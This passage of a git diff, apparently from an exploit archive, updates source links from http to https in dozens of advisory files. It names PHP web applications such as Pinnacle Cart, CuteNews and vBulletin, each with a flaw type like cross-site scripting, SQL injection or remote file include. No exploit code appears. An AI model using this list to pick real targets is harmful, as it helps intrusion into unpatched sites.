to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27800.txt b/exploits/php/webapps/27800.txt index 9538aaa4d..5f6b801ee 100644 --- a/exploits/php/webapps/27800.txt +++ b/exploits/php/webapps/27800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17794/info +source: https://www.securityfocus.com/bid/17794/info Pinnacle Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27803.txt b/exploits/php/webapps/27803.txt index ceb55fa69..edb00a0be 100644 --- a/exploits/php/webapps/27803.txt +++ b/exploits/php/webapps/27803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17812/info +source: https://www.securityfocus.com/bid/17812/info PhP-Gallery is prone to an information-disclosure vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27804.txt b/exploits/php/webapps/27804.txt index b35b133b1..f971d90ca 100644 --- a/exploits/php/webapps/27804.txt +++ b/exploits/php/webapps/27804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17812/info +source: https://www.securityfocus.com/bid/17812/info PhP-Gallery is prone to an information-disclosure vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27807.txt b/exploits/php/webapps/27807.txt index 04db80885..63d332f9d 100644 --- a/exploits/php/webapps/27807.txt +++ b/exploits/php/webapps/27807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17819/info +source: https://www.securityfocus.com/bid/17819/info Fast Click SQL Lite is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27808.txt b/exploits/php/webapps/27808.txt index c7dc1cad8..92dd9a68c 100644 --- a/exploits/php/webapps/27808.txt +++ b/exploits/php/webapps/27808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17821/info +source: https://www.securityfocus.com/bid/17821/info Pacheckbook is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27809.txt b/exploits/php/webapps/27809.txt index 5cb88a10a..673832c6e 100644 --- a/exploits/php/webapps/27809.txt +++ b/exploits/php/webapps/27809.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17823/info +source: https://www.securityfocus.com/bid/17823/info MyNews is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27810.txt b/exploits/php/webapps/27810.txt index 286afee86..2382deff3 100644 --- a/exploits/php/webapps/27810.txt +++ b/exploits/php/webapps/27810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17826/info +source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27811.txt b/exploits/php/webapps/27811.txt index f5b6f34f9..97cb699f7 100644 --- a/exploits/php/webapps/27811.txt +++ b/exploits/php/webapps/27811.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17826/info +source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27812.txt b/exploits/php/webapps/27812.txt index b3b8f3a57..52f881b4d 100644 --- a/exploits/php/webapps/27812.txt +++ b/exploits/php/webapps/27812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17828/info +source: https://www.securityfocus.com/bid/17828/info PHP Linkliste is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27818.txt b/exploits/php/webapps/27818.txt index 6945022a3..05ba5f674 100644 --- a/exploits/php/webapps/27818.txt +++ b/exploits/php/webapps/27818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17839/info +source: https://www.securityfocus.com/bid/17839/info Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27819.txt b/exploits/php/webapps/27819.txt index b2f926822..c2117e90a 100644 --- a/exploits/php/webapps/27819.txt +++ b/exploits/php/webapps/27819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17850/info +source: https://www.securityfocus.com/bid/17850/info CuteNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27821.html b/exploits/php/webapps/27821.html index 3b589f7f7..ea42d87af 100644 --- a/exploits/php/webapps/27821.html +++ b/exploits/php/webapps/27821.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17860/info +source: https://www.securityfocus.com/bid/17860/info OpenFAQ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27822.txt b/exploits/php/webapps/27822.txt index 08155d8fa..9d10bdab7 100644 --- a/exploits/php/webapps/27822.txt +++ b/exploits/php/webapps/27822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17865/info +source: https://www.securityfocus.com/bid/17865/info MyBloggie is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27823.txt b/exploits/php/webapps/27823.txt index 8a901b487..97f7c7069 100644 --- a/exploits/php/webapps/27823.txt +++ b/exploits/php/webapps/27823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17871/info +source: https://www.securityfocus.com/bid/17871/info openEngine is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27824.txt b/exploits/php/webapps/27824.txt index 70544f317..783556542 100644 --- a/exploits/php/webapps/27824.txt +++ b/exploits/php/webapps/27824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17874/info +source: https://www.securityfocus.com/bid/17874/info The 'singapore' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27829.txt b/exploits/php/webapps/27829.txt index 62af244a9..bc4bc6c64 100644 --- a/exploits/php/webapps/27829.txt +++ b/exploits/php/webapps/27829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17878/info +source: https://www.securityfocus.com/bid/17878/info Phil's Bookmark script is prone to an authentication-bypass vulnerability. The issue occurs because the affected script fails to prompt for authentication credentials. diff --git a/exploits/php/webapps/27831.txt b/exploits/php/webapps/27831.txt index e5288cedf..62b1a6ed3 100644 --- a/exploits/php/webapps/27831.txt +++ b/exploits/php/webapps/27831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27832.txt b/exploits/php/webapps/27832.txt index f1b568f34..ff8f0d1ef 100644 --- a/exploits/php/webapps/27832.txt +++ b/exploits/php/webapps/27832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27833.txt b/exploits/php/webapps/27833.txt index e4d464d95..095ad4320 100644 --- a/exploits/php/webapps/27833.txt +++ b/exploits/php/webapps/27833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27834.txt b/exploits/php/webapps/27834.txt index 216ad2070..b2ccefec0 100644 --- a/exploits/php/webapps/27834.txt +++ b/exploits/php/webapps/27834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27835.txt b/exploits/php/webapps/27835.txt index 1b22f8a67..4fe23bc32 100644 --- a/exploits/php/webapps/27835.txt +++ b/exploits/php/webapps/27835.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27836.txt b/exploits/php/webapps/27836.txt index 95690327f..fc9db6245 100644 --- a/exploits/php/webapps/27836.txt +++ b/exploits/php/webapps/27836.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17890/info +source: https://www.securityfocus.com/bid/17890/info Creative Community Portal is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27837.txt b/exploits/php/webapps/27837.txt index c063a83e7..63bd3637c 100644 --- a/exploits/php/webapps/27837.txt +++ b/exploits/php/webapps/27837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17893/info +source: https://www.securityfocus.com/bid/17893/info evoTopsite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27838.txt b/exploits/php/webapps/27838.txt index a27a86763..f48457872 100644 --- a/exploits/php/webapps/27838.txt +++ b/exploits/php/webapps/27838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27839.txt b/exploits/php/webapps/27839.txt index 948ee4457..be4e4ff3f 100644 --- a/exploits/php/webapps/27839.txt +++ b/exploits/php/webapps/27839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27840.txt b/exploits/php/webapps/27840.txt index 21d2a8b8c..263c4a34f 100644 --- a/exploits/php/webapps/27840.txt +++ b/exploits/php/webapps/27840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27841.txt b/exploits/php/webapps/27841.txt index 7aa655c5c..22fe3fdbc 100644 --- a/exploits/php/webapps/27841.txt +++ b/exploits/php/webapps/27841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17896/info +source: https://www.securityfocus.com/bid/17896/info Dynamic Galerie is prone to a directory-traversal vulnerability and a cross-site scripting vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27843.txt b/exploits/php/webapps/27843.txt index 144179bd6..d12c6bd83 100644 --- a/exploits/php/webapps/27843.txt +++ b/exploits/php/webapps/27843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17904/info +source: https://www.securityfocus.com/bid/17904/info MyBB is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27845.php b/exploits/php/webapps/27845.php index 9332187e4..e622af96b 100644 --- a/exploits/php/webapps/27845.php +++ b/exploits/php/webapps/27845.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17909/info +source: https://www.securityfocus.com/bid/17909/info ISPConfig is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27848.txt b/exploits/php/webapps/27848.txt index 7aefa3b91..e7cb20081 100644 --- a/exploits/php/webapps/27848.txt +++ b/exploits/php/webapps/27848.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17911/info +source: https://www.securityfocus.com/bid/17911/info EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27855.txt b/exploits/php/webapps/27855.txt index b8b65940a..3f386ace5 100644 --- a/exploits/php/webapps/27855.txt +++ b/exploits/php/webapps/27855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17949/info +source: https://www.securityfocus.com/bid/17949/info Vizra is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27857.txt b/exploits/php/webapps/27857.txt index 050b974eb..ec7625b5d 100644 --- a/exploits/php/webapps/27857.txt +++ b/exploits/php/webapps/27857.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17952/info +source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27858.txt b/exploits/php/webapps/27858.txt index 0f843a169..e17318e00 100644 --- a/exploits/php/webapps/27858.txt +++ b/exploits/php/webapps/27858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17952/info +source: https://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27859.txt b/exploits/php/webapps/27859.txt index fb9c91909..0a8fb21d5 100644 --- a/exploits/php/webapps/27859.txt +++ b/exploits/php/webapps/27859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17954/info +source: https://www.securityfocus.com/bid/17954/info OZJournals is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27863.txt b/exploits/php/webapps/27863.txt index 6ea74c81c..fca0888c5 100644 --- a/exploits/php/webapps/27863.txt +++ b/exploits/php/webapps/27863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17965/info +source: https://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. diff --git a/exploits/php/webapps/27864.txt b/exploits/php/webapps/27864.txt index 486d21011..0b377f6de 100644 --- a/exploits/php/webapps/27864.txt +++ b/exploits/php/webapps/27864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27865.txt b/exploits/php/webapps/27865.txt index 1e610052f..b1dcaaf80 100644 --- a/exploits/php/webapps/27865.txt +++ b/exploits/php/webapps/27865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27866.txt b/exploits/php/webapps/27866.txt index ab112c51d..004ceeaf1 100644 --- a/exploits/php/webapps/27866.txt +++ b/exploits/php/webapps/27866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27867.txt b/exploits/php/webapps/27867.txt index 9043af426..3dd476475 100644 --- a/exploits/php/webapps/27867.txt +++ b/exploits/php/webapps/27867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17967/info +source: https://www.securityfocus.com/bid/17967/info Gphotos is prone to multiple input-validation vulnerabilities. The issues include information-disclosure and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27868.txt b/exploits/php/webapps/27868.txt index 5fdabf96a..9a7364bf9 100644 --- a/exploits/php/webapps/27868.txt +++ b/exploits/php/webapps/27868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17970/info +source: https://www.securityfocus.com/bid/17970/info Pixaria PopPhoto is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27869.txt b/exploits/php/webapps/27869.txt index abaa2faad..4c41056ec 100644 --- a/exploits/php/webapps/27869.txt +++ b/exploits/php/webapps/27869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17974/info +source: https://www.securityfocus.com/bid/17974/info PSY Auction is prone to multiple input-validation vulnerabilities. The issues include HTML-injection and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27870.txt b/exploits/php/webapps/27870.txt index 89e77a075..19a3ce742 100644 --- a/exploits/php/webapps/27870.txt +++ b/exploits/php/webapps/27870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17974/info +source: https://www.securityfocus.com/bid/17974/info PSY Auction is prone to multiple input-validation vulnerabilities. The issues include HTML-injection and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27880.pl b/exploits/php/webapps/27880.pl index 6750f2ec6..ca2b6da97 100755 --- a/exploits/php/webapps/27880.pl +++ b/exploits/php/webapps/27880.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17975/info +source: https://www.securityfocus.com/bid/17975/info RadLance is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. diff --git a/exploits/php/webapps/27881.txt b/exploits/php/webapps/27881.txt index dcad4f6f7..d6b5b366c 100644 --- a/exploits/php/webapps/27881.txt +++ b/exploits/php/webapps/27881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17976/info +source: https://www.securityfocus.com/bid/17976/info phpODP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27883.txt b/exploits/php/webapps/27883.txt index e7b6b54f7..6bc483712 100644 --- a/exploits/php/webapps/27883.txt +++ b/exploits/php/webapps/27883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17983/info +source: https://www.securityfocus.com/bid/17983/info MonoChat is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27884.txt b/exploits/php/webapps/27884.txt index 3cc6e45fb..adabd9a84 100644 --- a/exploits/php/webapps/27884.txt +++ b/exploits/php/webapps/27884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17984/info +source: https://www.securityfocus.com/bid/17984/info Confixx is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27885.txt b/exploits/php/webapps/27885.txt index 3e35d3b75..a1cfea744 100644 --- a/exploits/php/webapps/27885.txt +++ b/exploits/php/webapps/27885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17994/info +source: https://www.securityfocus.com/bid/17994/info PhpRemoteView is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27886.txt b/exploits/php/webapps/27886.txt index 17334ca44..51f7c5b9e 100644 --- a/exploits/php/webapps/27886.txt +++ b/exploits/php/webapps/27886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17997/info +source: https://www.securityfocus.com/bid/17997/info Sphider is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27889.txt b/exploits/php/webapps/27889.txt index d6388e3b9..738f47372 100644 --- a/exploits/php/webapps/27889.txt +++ b/exploits/php/webapps/27889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18012/info +source: https://www.securityfocus.com/bid/18012/info BoastMachine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27899.txt b/exploits/php/webapps/27899.txt index 0bd93302a..bccabd76a 100644 --- a/exploits/php/webapps/27899.txt +++ b/exploits/php/webapps/27899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18041/info +source: https://www.securityfocus.com/bid/18041/info DownloadControl is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27900.txt b/exploits/php/webapps/27900.txt index d47da7b8c..c3393061f 100644 --- a/exploits/php/webapps/27900.txt +++ b/exploits/php/webapps/27900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18047/info +source: https://www.securityfocus.com/bid/18047/info Artmedic Newsletter is prone to a remote PHP code-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27904.txt b/exploits/php/webapps/27904.txt index a2bfd3217..9910a1691 100644 --- a/exploits/php/webapps/27904.txt +++ b/exploits/php/webapps/27904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18109/info +source: https://www.securityfocus.com/bid/18109/info Docebo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27905.txt b/exploits/php/webapps/27905.txt index 044a4e1ff..2d5e7bb65 100644 --- a/exploits/php/webapps/27905.txt +++ b/exploits/php/webapps/27905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18110/info +source: https://www.securityfocus.com/bid/18110/info DoceboLMS is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27907.txt b/exploits/php/webapps/27907.txt index 4fa591dfb..08b9a25c0 100644 --- a/exploits/php/webapps/27907.txt +++ b/exploits/php/webapps/27907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18117/info +source: https://www.securityfocus.com/bid/18117/info SaPHPLesson is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27908.txt b/exploits/php/webapps/27908.txt index edd82c9d6..6e7052652 100644 --- a/exploits/php/webapps/27908.txt +++ b/exploits/php/webapps/27908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18118/info +source: https://www.securityfocus.com/bid/18118/info Chipmunk Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27909.txt b/exploits/php/webapps/27909.txt index 508e4d0a5..dc54c15b3 100644 --- a/exploits/php/webapps/27909.txt +++ b/exploits/php/webapps/27909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18119/info +source: https://www.securityfocus.com/bid/18119/info Chipmunk Directory is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27910.txt b/exploits/php/webapps/27910.txt index d38676d23..ac204cb0f 100644 --- a/exploits/php/webapps/27910.txt +++ b/exploits/php/webapps/27910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18120/info +source: https://www.securityfocus.com/bid/18120/info AR-Blog is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27911.txt b/exploits/php/webapps/27911.txt index 1ee3b7a66..2281d2931 100644 --- a/exploits/php/webapps/27911.txt +++ b/exploits/php/webapps/27911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18122/info +source: https://www.securityfocus.com/bid/18122/info vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27912.txt b/exploits/php/webapps/27912.txt index a4d0a928b..f17494eab 100644 --- a/exploits/php/webapps/27912.txt +++ b/exploits/php/webapps/27912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18124/info +source: https://www.securityfocus.com/bid/18124/info CoolPHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27916.txt b/exploits/php/webapps/27916.txt index bdb4678fb..a510b93ec 100644 --- a/exploits/php/webapps/27916.txt +++ b/exploits/php/webapps/27916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18142/info +source: https://www.securityfocus.com/bid/18142/info Photoalbum B&W is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27917.txt b/exploits/php/webapps/27917.txt index c06b9d203..2295257f4 100644 --- a/exploits/php/webapps/27917.txt +++ b/exploits/php/webapps/27917.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18143/info +source: https://www.securityfocus.com/bid/18143/info TikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27919.txt b/exploits/php/webapps/27919.txt index c382c621b..d8e15fa8b 100644 --- a/exploits/php/webapps/27919.txt +++ b/exploits/php/webapps/27919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18154/info +source: https://www.securityfocus.com/bid/18154/info Geeklog is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27920.txt b/exploits/php/webapps/27920.txt index dc248b1e1..7df22ddaf 100644 --- a/exploits/php/webapps/27920.txt +++ b/exploits/php/webapps/27920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18161/info +source: https://www.securityfocus.com/bid/18161/info EVA-Web is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27921.txt b/exploits/php/webapps/27921.txt index d0545ce2d..836b69a1c 100644 --- a/exploits/php/webapps/27921.txt +++ b/exploits/php/webapps/27921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18161/info +source: https://www.securityfocus.com/bid/18161/info EVA-Web is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27922.txt b/exploits/php/webapps/27922.txt index 8afe6a156..19715f7b4 100644 --- a/exploits/php/webapps/27922.txt +++ b/exploits/php/webapps/27922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18161/info +source: https://www.securityfocus.com/bid/18161/info EVA-Web is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27924.txt b/exploits/php/webapps/27924.txt index 8c4c77780..f06f27513 100644 --- a/exploits/php/webapps/27924.txt +++ b/exploits/php/webapps/27924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18178/info +source: https://www.securityfocus.com/bid/18178/info ToendaCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27926.txt b/exploits/php/webapps/27926.txt index 4213a5dd8..b866e5a66 100644 --- a/exploits/php/webapps/27926.txt +++ b/exploits/php/webapps/27926.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18185/info +source: https://www.securityfocus.com/bid/18185/info phpMyDesktop|arcade is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. diff --git a/exploits/php/webapps/27927.txt b/exploits/php/webapps/27927.txt index 24792adb0..672577be3 100644 --- a/exploits/php/webapps/27927.txt +++ b/exploits/php/webapps/27927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18186/info +source: https://www.securityfocus.com/bid/18186/info PHP-Nuke is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27928.txt b/exploits/php/webapps/27928.txt index b102faccb..368288c9a 100644 --- a/exploits/php/webapps/27928.txt +++ b/exploits/php/webapps/27928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18190/info +source: https://www.securityfocus.com/bid/18190/info osTicket is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27929.txt b/exploits/php/webapps/27929.txt index deffef38b..8fdbbccdb 100644 --- a/exploits/php/webapps/27929.txt +++ b/exploits/php/webapps/27929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18197/info +source: https://www.securityfocus.com/bid/18197/info vBulletin is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27933.txt b/exploits/php/webapps/27933.txt index 8ca885710..27e44bc3a 100644 --- a/exploits/php/webapps/27933.txt +++ b/exploits/php/webapps/27933.txt @@ 